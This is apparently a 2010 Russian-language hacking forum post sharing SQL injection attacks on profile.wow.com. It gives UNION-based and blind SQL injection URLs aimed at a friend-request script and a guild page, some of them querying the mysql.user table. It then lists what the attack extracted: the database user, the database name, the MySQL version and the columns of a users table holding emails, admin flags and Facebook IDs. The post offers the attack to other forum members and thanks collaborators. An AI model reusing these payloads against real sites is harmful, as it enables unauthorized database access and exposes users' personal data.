28.05.2010, 18:50
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
wow дрочерам посвящается
http://profile.wow.com/includes/friendRequest.php?userId=527/**/union/**/select/**/1,2+from+mysql.user/*
or
http://profile.wow.com/guild/?id=0+union+select+1+from+user/*
or
http://profile.wow.com/includes/friendRequest.php?userId=99+and+1=if((select+subst ring(version(),1,1)<=5),1,(select+1+union+select+2 ))
blind-sqlinj
user(): wow_rw@305.1
database(): wow
version(): 5.0.41-log
PHP код:
table:users
---> column : imageId
---> column : nameUrl
---> column : bio
---> column : beta
---> column : buddyIcon
---> column : sns
---> column : banned
---> column : admin
---> column : date
---> column : name
---> column : private
---> column : email
---> column : newUser
---> column : guid
---> column : betaSigned
---> column : userId
---> column : entryDate
---> column : status
---> column : facebookId
Спасибо Pashkela и Jokester! 
Последний раз редактировалось $n@ke; 28.05.2010 в 18:53..
|
|
|